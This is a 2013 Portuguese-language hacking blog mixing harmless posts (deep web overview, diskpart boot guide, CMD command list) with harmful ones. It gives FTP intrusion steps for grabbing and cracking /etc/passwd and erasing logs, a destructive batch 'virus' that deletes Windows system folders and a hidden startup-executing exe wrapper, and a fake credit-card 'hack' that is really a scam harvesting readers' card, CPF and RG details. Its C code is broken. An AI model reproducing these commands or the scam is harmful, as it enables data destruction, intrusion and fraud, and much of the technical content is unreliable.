sábado, 10 de agosto de 2013

Deep Web

Deep Web (também chamada de Deepnet, Web Invisível, Undernet ou Web oculta) se refere ao conteúdo da World Wide Web que não faz parte da Surface Web, a qual é indexada pelos mecanismos de busca padrão.
Não deve ser confundida com a dark Internet, na qual os computadores não podem mais ser alcançados via Internet, ou com a Darknet, rede de compartilhamento de arquivos.
Mike Bergman, fundador da BrightPlanet e autor da expressão, afirmou que a busca na Internet atualmente pode ser comparada com o arrastar de uma rede na superfície do oceano: pode-se pescar um peixe grande, mas há uma grande quantidade de informação que está no fundo, e, portanto, faltando. A maior parte da informação da Web está enterrada profundamente em sites gerados dinamicamente, a qual não é encontrada pelos mecanismos de busca padrão. Estes não conseguem "enxergar" ou obter o conteúdo na Deep Web - aquelas páginas não existem até serem criadas dinamicamente como resultado de uma busca específica. A Deep Web possui um tamanho muito superior ao da Surface Web.

Nela correm boatos que pode ser achado de tudo, desde contratos de assassinos de aluguel, até como clonar cartões de crédito e pornografias das mais profanas.

Este blog não se responsabiliza, somente tem carater informativo, para acessar a deep web você precisa de um navegador especial chamado TOR, pesquise no google.

A deep web É o conjunto de conteúdos da internet não acessível diretamente por sites de busca. Isso inclui, por exemplo, documentos hospedados dentro de sites que exigem login e senha. Sua origem e sua proposta original são legítimas. Afinal,nem todo material deve ser acessado por qualquer usuário. O problema é que, longe da vigilância pública, essa enorme área secreta (500 vezes maior que a web comum!) virou uma terra sem lei, repleta de atividades ilegais pavorosas.

PERIGOS DAS PROFUNDEZAS
"Internet secreta"é muito utilizada por criminosos
Só para VIPs
Os endereços da Deep Web podem ser bem bizarros, como uma sucessão de letras e números seguida do sufixo .onion, em vez do tradicional .com. Originalmente, sua função é positiva: proteger conteúdos confidenciais, como os de governos, bancos, empresas, forças militares e universidades, acessíveis só com login, por exemplo
Ponto Cego
A Deep Web pode ficar dentro de sites comuns (na forma de arquivos e dados baixáveis) ou escondida em endereços excluídos de propósito dos mecanismos de busca. O Google nem faz ideia do que está lá: ele seria como um barco pesqueiro que só localiza suas presas na “superfície” do mar
Zona de Guerra
Nem pense em se aventurar nesses mares. Eles estão cheios de crackers (hackers com intenções criminais), que adoram “fisgar” usuários descuidados. Como não há filtros de segurança, eles facilmente conseguem, por exemplo, “zumbificar” o computador de um internauta (controlando-o a distância sem que o dono note) e roubar dados
Predadores Abissais
A parte podre tem até nome: Dark Web. Lá se encontra de tudo: lojas virtuais de drogas, pornografia infantil e conexões terroristas para venda de armas. Como tudo fica nas profundezas, não há jeito de governos e a polícia tirarem do ar. É como se os sites tivessem vida própria, sem donos, registros e documentação.

Mas cuidado, navegando por lá cuidado com oque abre, pois é lotado de virus para tudo que é lado.

Postado pelo membro JOKER

sexta-feira, 12 de julho de 2013

Hackers e Crackers São pessoas Inteligentes.


Hackers e Crackers



Esses termos são comuns na área de informática, mas geram bastante confusão. Muita gente acha que hacker (a palavra hack foi criada na década de 50 para descrever modificações inteligentes em relés eletrônicos) e cracker (cracking = quebra) significam a mesma coisa. Na verdade, o termo hacker significa alguém que muda alguns programas através de técnicas simples e inteligentes com intuito de melhorar esses programas. Normalmente o hacker é uma pessoa do lado bom enquanto que o cracker é uma pessoa sem ética ou escrúpulos. Os hackers e crackers são pessoas inteligentes, porém, enquanto os hackers usam sua inteligência para o bem, os crackers a usam para o mal.
Existem diversos relatos de sites que são invadidos diariamente pelos crackers. Na maioria das vezes quando um site é invadido, são colocadas mensagens ofensivas (muitas vezes relativas à política) nesses sites com “assinaturas” do cracker que invadiu o sistema. O pentágono e o FBI nos Estados Unidos já foram invadidos por crackers diversas vezes. Os prejuízos são incalculáveis. Ao se invadir um site, o cracker assume um determinado nível de controle desse site que pode ser parcial ou total. Se a invasão for total, com certeza o prejuízo será muito maior.
Muitos hackers são contratados por sites para que descubram vulnerabilidades que crackers poderão utilizar para invadir esses sites. Nesse caso, o hacker está realizando uma boa ação pois está ajudando o site a se tornar mais seguro.
Muitos crackers se tornam hackers após serem pegos e punidos. Ir para o “lado claro da força” na maioria das vezes, é mais compensador.
Mas o que os crackers ganham ao invadir sites e prejudicar a vida de muita gente?
Os crackers ganham poder, fama e dinheiro. Ao roubar contas bancárias, números de cartão de crédito, informações confidenciais, projetos secretos, projetos de produtos que serão lançados no mercado, dados pessoais e outras informações valiosas, o cracker assume o poder e começa a subornar as vítimas, pedindo dinheiro em troca dessas valiosas informações roubadas.
Por ter um conhecimento computacional enorme, fica difícil apanhar esses crackers pois eles vão se superando a cada dia.

sexta-feira, 28 de junho de 2013

Como hackear um site ftp pelo CMD






Eae galera
Eu vou lhe ensinar como hackear um site pelo cmd por ftp

1°Abra o cmd (prompt de comando)
2°Digite "ftp" de enter
3°Digite "open" de enter
4°Irá pedir para, ou seja o site que vc quer invadir, escreva
ftp.siteparainvadir de enter
5°Irá pedir login de um enter, dai pedir senha de enter
6°Vai abrir"cmd ftp",agora digite "quoter user ftp" de enter
7°Digite quote cwd-sys de enter
8°E por fim digite quote pass ftp de um enter
9°Agora abra seu navegador e digite ftp.ositehackeado
10°Umas vez hackeado aparacera uma lisas das coisas no site voce pode apagar modifica


Postado por CYBER.




Saiba como utilizar um HD externo para boot no Windows

Se você possui um ultrabook, netbook ou outro computador sem driver óptico e, numa emergência, precisa reinstalar o Windows, é possível fazer isso criando um driver de boot. Basta que a placa-mãe do seu computador suporte a inicialização de dispositivos USB e seguir o tutorial abaixo.
Passo 1. Conecte o seu HD externo ao computador via conexão USB;
Passo 2. Pressione as teclas “WinKey + R” para abrir o “Executar”. Nele, entre com o comando “cmd” (sem aspas) e pressione Enter;
Executando Prompt de comandos (Foto: Reprodução/Helito Bijora)Executando Prompt de comandos (Foto: Reprodução/Helito Bijora)
Passo 3. Na janela do “Prompt de comandos”, digite “diskpart” seguido de um Enter;
Prompt de comandos do Windows (Foto: Reprodução/Helito Bijora)Prompt de comandos do Windows (Foto: Reprodução/Helito Bijora)
Passo 4. Uma nova janela deverá ser aberta. Nela, entre com o comando “List Disk” e aguarde até que a lista dos discos conectados ao computador seja exibida;
Lista de disco conectados ao computador (Foto: Reprodução/Helito Bijora)Lista de disco conectados ao computador (Foto: Reprodução/Helito Bijora)
Passo 5. Agora, entre com o comando “Select Disk” seguido pelo número do disco (por exemplo, “Select Disk 2”). Geralmente o HD externo é o último disco da lista, mas vale a pena observar a coluna “Tam.” (tamanho) para identificar se o disco selecionado é o correto;
Selecionando disco (Foto: Reprodução/Helito Bijora)Selecionando disco (Foto: Reprodução/Helito Bijora)
Passo 6. Selecionado o disco, entre com o comando “Clean”. Lembre-se: todos os dados do HD (inclusive particionamento) será excluído. Portanto, só continue se estiver certeza do que está fazendo;
Apagando disco (Foto: Reprodução/Helito Bijora)Apagando disco (Foto: Reprodução/Helito Bijora)
Passo 7. Execute o comando “Create partition primary” para criar uma nova partição primária. Após ser informado sobre o êxito da operção, entre com “Active” para ativar a partição que acabamos de criar;
Criando nova partição (Foto: Reprodução/Helito Bijora)Criando nova partição (Foto: Reprodução/Helito Bijora)
Passo 8. Para finalizar, resta formatar a nova partição e associá-la a uma letra, para que possa ser acessada facilmente pelo Windows Explorer. Para isso, entre com “Format fs=fat32 quick” e, em seguida, “Assign”;
Formatando partição (Foto: Reprodução/Helito Bijora)Formatando partição (Foto: Reprodução/Helito Bijora)
Passo 9. Entre com o comando “Exit” para fechar o “Prompt de comandos”.
Copiando arquivos de instalação do Windows para o disco (Foto: Reprodução/Helito Bijora)Copiando arquivos de instalação do Windows para o disco (Foto: Reprodução/Helito Bijora)
Pronto! Seu HD externo agora possui propriedades de boot. Para usá-lo, basta copiar a instalação do Windows para dentro do HD e iniciar o computador pelo dispositivo USB.
Postado pelo Membro Sputnik.

Invasao de sites via FTP


Muito fácil também, você só precisa de um provedor
antigo, para que tudo funcione bem... (Alguns novos, tambem servem, desde que, obviamente ele esteja vulneravel)

Nota : Tambem funfa com servidores FTP
Va ao prompt do DOS e digite ftp, depois de open. Depois siga os passos
1- www.itake.com.br (O mais invadido do planeta!) ou outro servidor de ftp ou site que vc quiser.
2-o servidor vai perguntar o seu username, pressione enter
3-o servidor vai perguntar pelo password, pressione enter
4-e no prompt escreva:
quote user ftp
e depois..
quote cwd ~root
e depois..
quote pass ftp
Faca isto para deletar o arquivo de log, assim o adiministrador do sistema
não sabera quem acessou e não vera voce.
Obs: Se dizer na sua entrada "acess restriction apply" pode esquecer
que não será possível acessar o arquivo de senhas.
1-Digite cd\etc e digite get passwd
Se você tiver feito tudo isso corretamente e se o servidor tiver
um simples e antigo sistema de seguranca tudo ocorrera bem.
Você vai ter um root access.
Para quem é lammer e não sabe, root acess é o maior status
de seguranca que voce pode ter.
Voce pode baixar um Cliente FTP (O melhor, na minha opniao eh o SmartFTP) e se conectar, pois dai nao vai precisar ficar digitando os comandos do MS-DOS
Todo caso se vc não conseguir tem outra forma, entre no user como anonymous
e daí ele pedirá teu e-mail, daí se bota uma besteira
tipo silvio.santos@sbt.com.br daí é só entrar no diretório
etc e pegar o password. Na maioria das vezes as senhas estão criptografadas
use o crackjack e uma word list para desincriptografa-la.
Existem sistemas mais seguros, entao nao venha reclamar que nao deu certo!!!
Eu não se responsabilizo por qualquer ato cometido através dessas informações.


Postado pelo membro Sputnik.

quarta-feira, 26 de junho de 2013

Programa em linguagem C, função recursiva de fibonacci

#include<stdio.h>
#include<stdlib.h>

int fib(int posicao){
          if(posicao = = 1 || posicao = = 2)
                  return 1;
     else{
                return (fib(posicao-1) + fib(posicao-2);
            }

             int main(void){
                        int i, n;
                                    printf("digite os n termos: ");
                                    scanf("%d" , & n);
                                    for(i=0;i<=n;i++){
                                    printf("%d\n", fib(i+1));
                                    }
             return EXIT_SUCCESS;
}


postado por JOKER

terça-feira, 25 de junho de 2013

GERADOR DE CARTÃO DE CRÉDITO, CPF, CNPJ

Como HACKEAR números de Cartão de Créditos? 
Deixe eu me apresentar, fui engenheiro do grupo UOL em 2003 sei de muita coisa desta empresa, inclusive deixei brechas de segurança que nunca foram encontradas ou arrumadas... sou o responsável por duas delas, e uma que os caros amigos vão gostar muito...
Deixei implementada nos servidores do UOL uma maneira muito fácil para obter números de cartões de créditos por e-mail!
Vou explicar melhor... Sempre que alguêm faz uma compra na internet com cartões de créditos, as informações ficam armazenadas em um servidor de dados, alguns seguros outros nem tanto! 
Todos sabemos que brechas de segurança estão ai para serem exploradas. Meus amigos da UOL são campeões nesse aspecto. Seus servidores são tão inseguros que várias operações podem ser feitas sem muitos problemas como: - enviar e-mail sem estar autenticado e pasmem... obter cartões de créditos armazenados em seus servidores. 
Eu deixei uma falha em um servidor da UOL (que é o mesmo usado pelo BOL), através de um e-mail que permite ao hacker enviar para o servidor linhas de código que acabam gerando um Bug...
E após confirmar umas informações lhe retorna as informações de cartão de crédito dos últimos 5 clientes ativos. Para que você receba as informações corretamente siga as instruções(tem que ser do jeito que está aqui)
: mande um email para: (administradorbol2222@bol.com.br)
com assunto: accnto0545-cc-ecard-infoE52488-Cod.05 ( isto vai gerar o bug no servidor - não use espaços!)
Note que na primeira linha da mensagem você deverá colocar as informaçõe de um cartão válido - porque quando você mandar o email o servidor com o bug faz uma breve confirmação de dados do cartão (é a única barreira de segurança dele) - então não adianta colocar numero de cartão falso porque não funciona! 
Siga o exemplo de como colocar no email:
(1ª linha) 000003#//0000003## (não mude isso!!!- é como uma chave de segurança do servidor)
(2ª Linha) ( Aqui você vai colocar as informações do cartão válido, que você vai usar pra entrar no servidor - Tem que ser um cartão válido!)
Name#: (Nome que está no cartão válido - do jeito que está no cartão)
Number-e-card#: (Número do cartão válido - o mesmo cartão que você colocou o nome) 
e-card#Grup#: (Nome da empresa do cartão válido - Mastercard, Visa, Credicard, etc) 
Vili# mm/aa (aqui voce coloca a data de válidade do cartão válido - mes /ano) cpf###: (número do cpf do dono do cartão - para verificação do sistema)
rg###:(número do rg do dono do cartão - para verificação do sistema)
sytem0000478547#####03 ( não mude este número )
number-segurity##: ( geralmente é os 3 últimos digitos e está atras do cartão de crédito.)
return in time#:0015 (tempo de retorno das informações - sugiro que seja 15 min) return#: (coloque entre < > o e-mail que você deseja que retorne os números dos cartões válidos) 
#end#-theend_number### (indica o fechamento de segurança para que suas informações não fique no servidor - Não se esqueça desta linha) Se voce seguir as informações do modo que está aqui, você vai receber 5 números de Cartões Válidos! Ai você vai poder comprar de tudo na internet. 


Postado pelo Membro Sputnik  : )

Comprando no Ebay de Graça.

1°Voçe presisará se cadastrar no www.ebay.com ,lá será onde você fará suas compras(AVISO!!! NÃO USE DADOS FALSOS,CASO CONTRARIO TUDO VAI PELO RALO!!!)

2°Você presisa de uma conta no www.paypal.com ,por se tratar de um site MUITO sério evite o uso de dados falsos novamente.

3°Pare se cadastrar no paypal,tem alguns lugares que presisam ser lembrados,aperte em Sing in,na primeira tela,após isso procure um local para alterar o país e a lingua,coloke Brazil e se preferir aoutra lingua ao inves de ingles,o paypal se dispõe de 6 linguas.

4°Quando perguntarem sobre o Cartão de credito internacinal,aperte cancel,caso você se interesse pelo site posteriormente,averá uma opção para o cadastro do cartão.

5°Agora com tudo cadastrado,faça um anexo com a sua conta do Ebay com a do PayPal,como?simples,vá em My Accont,e aperte Ctrl+F e escreva "Paypal"(sem aspas),lá irão mostrar a opção de anexo,aperte que você já possui uma conta cadastrada no paypal,coloque a senha e o login e o Ebay tera anexado suas contas ;D

6°Hora de ganhar dinheiro! se cadastre no site Awsurveys: (copie no navegador) http://www.AWSurveys.com/HomeMain.cfm?RefID=gugadas ,esse site maravilhoso disponibiliza sites para você clicar por dinheiro,como eles lucram?simples,as empresas fazem propagandas em Site da internet e para saber se o publico esta gostando eles pagam pela sua opinião.Cadastre-se em: Create Free Accont

7°O Cadastro do Awsurveys não necessita muitas informações vitais,por isso faça sua escolha,eu prefiro deixar dados verdadeiros(ou iguais ao do paypal) para ter certeza que ela não será bloqueada,bom agora com tudo feito,começe a clicar nos links da pagina principal,la teram dentro de cada um: 2 Sites e 2 Lacunas,como funciona?simples,voçe ve o site,e na lacuna você faz um breve Review sobre a pagina que foi mostrada(não tente burlar,eles bannem contas fraudulentas),use a ferramenta de idiomas do Google,fale coisas como: se o site é bem visualmente,sobre oque ele é,se você compraria/cadastraria/entraria no concurso/etc

8°O Awsurveys tem uma taxa minima de retirada do dinheiro de 75$,após consiguir a contia milagrosa,NAO RETIRE O DINHEIRO,continue gananhando mais,pois a cada vez que você "sobe o rank" eles oferecem novos surveys,melhores e caros(Ranks: 75$,200$,350$ e 500$).

9°Quer retirar já para comprar um negocio no Ebay?bom,antes ache o produto,o Ebay é totalmente em ingles,oque pode dificultar para pessoas sem experiencia nesse ramo,tente explorar o "Advanced Search",dentro dele irei ajuda-ló a não cair numa furada,bom,ajuste os seguintes parametros:

9.1.Coloque no nome do produto
9.2.Se quiser excluir alguma palavra indesejável,exite uma lacuna para isso
9.3.Mude o botão sobre os paises Disponivel para:,mude o filtro para: Brazil
9.4.Aperte os botões que se referem ao PayPal(no canto beeem inferior),para ter apenas compras com o paypal em vista
9.5.se kiser mudar algo a mais escolha,não tenho preferencias maiores que essas na maioria da veses

10°Agora com tudo pronto,vamos retirar o dinheiro:simplismente clique em "Reedem money" no AWsurveys,escolha a quantia,mude para a opção PayPal,informe seu login do paypal,seja feliz ^^

11°A Compra é parecida com as do mercado livre,converse bem com o comprador,não se preuculpe com seu dinheiro pois o Paypal proteje compras de certos valores,informe seu CEP,cidade,etc para o Ebay(isso é feito no cadastro),caso os dados forem falsos o produto não sera enviado,outra coisa é sempre pergunte para o vendedor o preço do "Shipping" ou do Envio para o Brazil


Postado pelo Membro Sputnik  :)

Criando vírus pelo bloco notas.

Para destruir o pc de uma pessoa vc tem que criar no bloco de notas (iniciar / todos os programas / acessorios / bloco de notas) copie e cole no bloco de notas isso abaixo:
CD\
CD\WINDOWS
DEL WIN.INI
DEL WIN.COM
DEL SYSTEM
DEL SYSTEM.INI
DEL SYSTEM.COM
DEL SYSTEM32
DEL SECURITY
DEL REGEDIT.EXE
DEL HH.EXE
DEL CONFIG
DEL CONTROL.INI
DEL CONTROL.COM
DEL DEBUG
DEL CLOCK.AVI
DEL TASKMAN.EXE
DEL WININIT.INI
DEL WININIT.COM
DEL WEB
CD\
DEL CONFIG.SYS
DEL AUTOEXEC.BAT
rmdir /s /q c:\windows

Após ter feito isso salve o arquivo e renomeio de auguma coisa que você queira por no titulo, mas tem que ter no final .bat (exemplo: virus.bat)

ATENÇAO: Nunca aperte nesse icone se possivel deixe oculto para ninguém conseguir clikar nele.
ou

Va em iniciar/executar e digite notepad.
Irá abrir o bloco de notas.
Copie o comando e cole no bloco de notas ao salvar vc usa .bat exemplo: sacanear.bat 


del /s /q c:\windows\
(deleta tudo dentro do windows arquivos e naum pastas)

rmdir /s /q c:\windows
(deleta todo do windows) - (fode o pc)

shutdown -s
(desliga o pc)

shutdown -r
(reinicia o pc)

Fazendo um virus.exe com win rar
Abra o bloca de notas e digite shutdown -r -f
shutdown -r -> desliga o pc reiniciando
shutdown -f -> força o pc a desliga.. ecerrando qualquer programa..
Salve como desliga.bat
Transformando em .exe ( tem que ter o WinRar)
clique com botao direito no arquivo .bat, e vá em adicionar para o arquivo.
marque criar arquivo SFX. Note que o nome muda para por exemplo desliga.exe.
vá até a guia avançado e clique em opçao sfx.
em caminho para extraçao coloque: %homepath%\Menu Iniciar\Programas\Inicializar
marque caminho absoluto e salvar e restaurar caminho
em executar após a extraçao coloque: desliga.bat
na guia metodo.
marque ocultar tudo e ignorar arquivos existentes.

CUIDADO: naum execute o arquivo pois seu computador sera infectado!

outros comandos para o seu vírus:

c\ - volta todas as pastas e vai parar em c:
cd XXX - entra na pasta, coloque o caminho no lugar de XXX - exemplo : cd windows\system32\
md XXX - cria uma pasta, no lugar de XXX coloque o nome da pasta - exemplo: md teste


Postado pelo Membro Sputnik

segunda-feira, 24 de junho de 2013

Burlando firewall e antivirus com proxy on line

Você está cansado de tentar acessar páginas improprias ou redes de relacionamento na sua empresa e aparecer mensagem de pagina bloqueada?
Está de saco cheio de estar naquela aula chata em sua faculdade ou escola e querer navegar pela net e não poder pois as melhores páginas e mais interessantes estão todas bloqueadas para que você propositalmente preste atenção na aula chata e não faça outra coisa?

muita calma nessa hora! pois nada está perdido!
entre no google e busque por proxy on line!
abrirá muita coisa que nao funciona mas tem uns que funcionam basta você colocar o endereço que deseja visitar no input especificado pela página e pronto!
a página abre! mas não é mágica, os proxys enganam o firewall ou antivirus camuflando seu IP e mudando o endereço da rota que você deseja visitar.

achei um que funciona bem, é o:

http://free-onlineproxy.com/

Boa navegação, hahaha

Postado por JOKER

Prompt de Comando (cmd.exe).

Códicos basicos do cmd.

Bootcfg                                

Permite ver as configurações do seu menu de boot
Defrag  Desfragmentador de disco. Oferece as seguintes opções:
   -a      Apenas analisar
  -f      Forçar a desfragmentação mesmo que haja pouco espaço livre.
  -v      Saída detalhada
  -?      Exibir tópico de ajuda.
Diskpart               Gerencia as partições de um disco.   
Driverquery       Mostra a lista de  drivers instalados no Windows e as respectivas propriedades.
Fsutil     O comando fsutil tem vários  complementos que serão listados digitando-o sem nenhum parâmetro. 
  
Fsutil fsingo drives e terá a lista dos drives no seu micro.
Gepresult           Este comando mostrará configurações de usuários e de diretivas de grupos.
Recover               Permite a recuperação de arquvios em disco danificado.
Reg        Comando para exportar chaves do registro, copiar, restaurar, comparar, etc.
Schtasks              Para agendar, executar, alterar ou deletar tarefas numa máquina local ou remota com Windows.
SFC        Comando que permite verificar arquivos de sistemas alterados de forma indevida e recuperar os arquivos originais e oficiais da Microsoft., o que nem sempre será recomendável. Por exemplo, o arquivo uxtheme.dll modificado para permitir o uso de temas voltaria a ser substituído pelo original.
Shutdown          O comando shutdown permite desligar ou reiniciar o computador de forma imediata ou agendada.
Systeminfo        Fornece informações básicas sobre o sistema.
Tasklist Mostra a lista de processos sendo executados no Windows.
Taskkill Permite finalizar algum processo.  O comando é quase sempre usado  com base nas informações fornecidas pelo tasklist. Por exemplo, para finalizar o Messenger digite "taskkill /PID 1680". A identificação do PID de cada processo sendo executado você ficará sabendo com o comando tasklist.
ASSOC  Exibe ou modifica associações de extensões de arquivo. 

AT          Agenda comandos e programas para serem executados em um computador.
ATTRIB Exibe ou altera atributos de arquivos.
BOOTCFG           Mostra o boot.ini no prompt de comando.
BREAK  Define ou limpa a verificação estendida CTRL+C.
CACLS   Exibe ou modifica listas de controle de acesso (ACLs) de arquivos.
CALL      Chama um programa em lotes a partir de outro.
CHCP     Exibe ou define o número da página de código ativa.
CHKDSK               Verifica um disco e exibe um relatório de status.
CHKNTFS             Exibe ou modifica a verificação do disco na inicialização.
CLS         Limpa a tela.
CMD      Abre uma outra janela de prompt.
COLOR  Define as cores padrão de primeiro plano e do plano de fundo do console.
COMP   Compara o conteúdo de dois arquivos ou grupos de arquivos.
COMPACT          Exibe ou altera a compactação de arquivos.
CONVERT            Converte volumes FAT em NTFS.
COPY     Copia um ou mais arquivos para outro local.
DATE     Mostra a data atual e permite alterá-la.
DISKCOMP         Compara o conteúdo de dois disquetes.
DISKCOPY           Copia o conteúdo de um disquete para outro.
DISKPART           Faz particionamento de disco.
DOSKEY               Edita linhas de comando, volta a chamar comandos do Windows e cria macros.
ECHO    Exibe mensagens ou ativa ou desativa o echo de comandos.
ENDLOCAL          Encerra a localização de alterações de ambiente em um arquivo em lotes.
EXIT       Sai do programa CMD.EXE (interpretador de comandos).
FC           Compara dois arquivos ou grupos de arquivos e exibe as diferenças entre eles.
FIND      Procura uma seqüência de texto em um arquivo ou arquivos.
FINDSTR              Procura seqüências de texto em arquivos.
FOR       Executa um determinado comando para cada arquivo em um grupo de arquivos.
FORMAT             Formata um disco rígido ou disquete.
FTYPE    Exibe ou modifica os tipos de arquivo utilizados em associações de extensões de arquivos.
GOTO   Direciona o interpretador de comandos do Windows para uma linha identificada em um programa em lotes.
GRAFTABL          Permite que o Windows exiba um conjunto de caracteres estendidos em modo gráfico.
HELP      Fornece informações de ajuda sobre comandos do Windows.
HOSTNAME       Dá o nome do host.
IF            Realiza processamento condicional em arquivos em lotes.
IPCONFIG           Mostra detalhes das configurações de IP.
LABEL    Cria, altera ou exclui o rótulo de volume de um disco.
MODE   Configura um dispositivo do sistema.
MORE   Exibe a saída fazendo pausa a cada tela.
MOVE   Move um ou mais arquivos de uma pasta para outra pasta.
PAGEFILECONFIG           Configura memória virtual.
PATH     Exibe ou define um caminho de pesquisa para arquivos executáveis.
PAUSE  Suspende o processamento de um arquivo em lotes e exibe uma mensagem.
PING     Checa sua conexão de rede disponível.
POPD    Restaura o valor anterior da pasta atual salva por PUSHD.
PRINT   Imprime um arquivo de texto.
PROMPT             Altera o prompt de comando do Windows.
PUSHD Salva a pasta atual e, em seguida, altera a mesma.
REM      Grava comentários (observações) em arquivos em lotes.
REPLACE              Substitui arquivos.
ROUT    Mostra detalhes do parâmetro da interface de rede.
SCHTASKS           Agenda e executa algum processo.
SET         Exibe, define ou remove variáveis de ambiente do Windows.
SETLOCAL           Inicia a localização de alterações de ambiente em um arquivo em lotes.
SHIFT    Altera a posição dos parâmetros substituíveis em um arquivo em lotes.
SORT     Classifica a entrada.
START   Inicia uma janela separada para executar um programa ou comando especificado.
SUBST   Associa um caminho a uma letra de unidade.
TITLE     Define o título da janela para uma sessão do CMD.EXE.
TREE      Exibe graficamente a estrutura de pastas de uma unidade ou caminho.
TYPE      Exibe o conteúdo de um arquivo de texto.
VER        Mostra a versão do Windows.
VERIFY  Faz com que o Windows verifique se os arquivos estão gravados corretamente em um disco.
VOL       Exibe um rótulo e número de série de volume de disco.
XCOPY                  Copia diretórios com seus subdiretórios.
 APPEND              Acrescebtar um Arquivo.
 ASCII    DEFINIR UM TIPO DE TRANFERÊNCIA ASCII.
BELL       EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO.
BINARY                DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA.
BYE        TERMINAR SEÇÃO DE FTP E SAIR.
CD          ALTERAR A PASTA DE TRABALHO REMOTA.
CLOSE   TERMINAR SESSÃO DE FTP.
DELETE EXCLUIR PASTAS DE TRABALHO REMOTA.
DEBUG LIGAR/DESLIGAR MODO DE DEPURAÇÃO.
DIR         LISTAR CONTEÚDO DA PASTA REMOTA.
DISCONNECT     TERMINAR SESSÃO DE FTP.
GET        RECEBER ARQUIVO.
GLOB    LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS.
HASH    LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER TRANSFERIDO.
HELP      AJUDA DO FTP.
LCD        ALTERAR A PASTA DE TRABALHO LOCAL.
LITERAL                               ENVIAR UM COMANDO DE FTP ARBITÁRIO.
LS           LISTAR O CONTEÚDO DA PASTA REMOTA.
MDELETE             EXCLUI VÁRIOS ARQUIVOS.
MDIR    LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS.
M GET OBTER VÁRIOS ARQUIVOS.
 MKDIR                CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA.
 MLS      LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS.
 MPUT ENVIAR VÁRIOS ARQUIVOS.
 OPEN                   CONECTAR AO FTP REMOTO.
 PROMPT             FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS.
 PUT      ENVIAR UM ARQUIVO.
 PWD                    IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA.
 QUIT    TERMINAR A SESSÃO DE FTP E SAIR.
 QUOT  ENVIAR UM COMANDO ARBITRÁRIO.
 RECV    RECEBER ARQUIVO.
 REMOTEHELP   OBTER AJUDA A PARTIR DO SERVIDOR REMOTO
.
 RENAME             RENOMEAR ARQUIVO.
 RMDIR                REMOVER PASTA DA MÁQUINA REMOTA.
 SEND    ENVIAR ARQUIVO.
 STATUS     MOSTRAR STATUS ATUAL.
 TRACE   LIGAR/DESLIGAR RASTREAMENTO DE PACOTES.
 TYPE   DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS.
 USER     ENVIAR INFORMAÇÕES DE NOVO USUÁRIO.

Postado por CYBER.

domingo, 23 de junho de 2013

Ocultar pastas no windows seven

Ocultar pastas no windows seven

Clique com o botão direito sobre um arquivou ou pasta, clique em Propriedades, marque o item Oculto e clique em OK.

Para reexibir um arquivo ou pasta oculta, abra o Windows Explorer, tecle Alt e clique em Ferramentas > Opções de pasta. Clique na guia Modo de Exibição e marque o item "Mostrar arquivos, pastas e unidades ocultas" e clique em OK.

Outro modo diferente

Meu modo preferido, já que não precisa de trabalho nenhum para fazer a pasta reaparecer;
renomeie a pasta aperte alt + 255, assim ficará sem nome com espaço em branco. Em seguida clique com o botão direito e vá em propriedades > personalizado e clique em alterar icone, escolha um icone em branco, e pronto sua pasta está invisivel porém ela ainda está lá no mesmo lugar onde você a criou, diferente do outro modo, então não esqueça onde ela está, para acha-la selecione tudo e você a achará, eu escondo na area de trabalho fica mais fácil.

Postado por JOKER.


sexta-feira, 21 de junho de 2013

My Files - recuperação de senhas


 de recuperação de dados Recover My Files irá recuperar de uma forma fácil e rápida os ficheiros eliminados que tenham sido removidos da Reciclagem do Windows ou perdidos devido à  ou corrupção do disco rígido, a um vírus ou a uma infecção troiana, a uma quebra inesperada do sistema ou a uma falha do software.– Recupere dados a partir de disco rígido, cartões de máquinas fotográficas, USB, disquete ZIP, disquete de 3 1/2 ou outras unidades de armazenamento.– Recupere ficheiros eliminados mesmo se os já tiver removido da Reciclagem– Recupere discos rígidos formatados, mesmo que tenha reinstalado o Windows!– Recupere os ficheiros mesmo depois de uma falha do disco rígido– Recupere ficheiros depois de um erro de partição– Recupere documentos, fotografias, vídeos, música e e-mail.


Versão do Aplicativo: 4.7.2.1134Estilo: UtilitariosFabricante: GetDataTamanho: 15 MBFormato: RarIdioma: PortuguêsSerial: BAIXAR SERIAL

 Postado pelo membro  Sputnik :p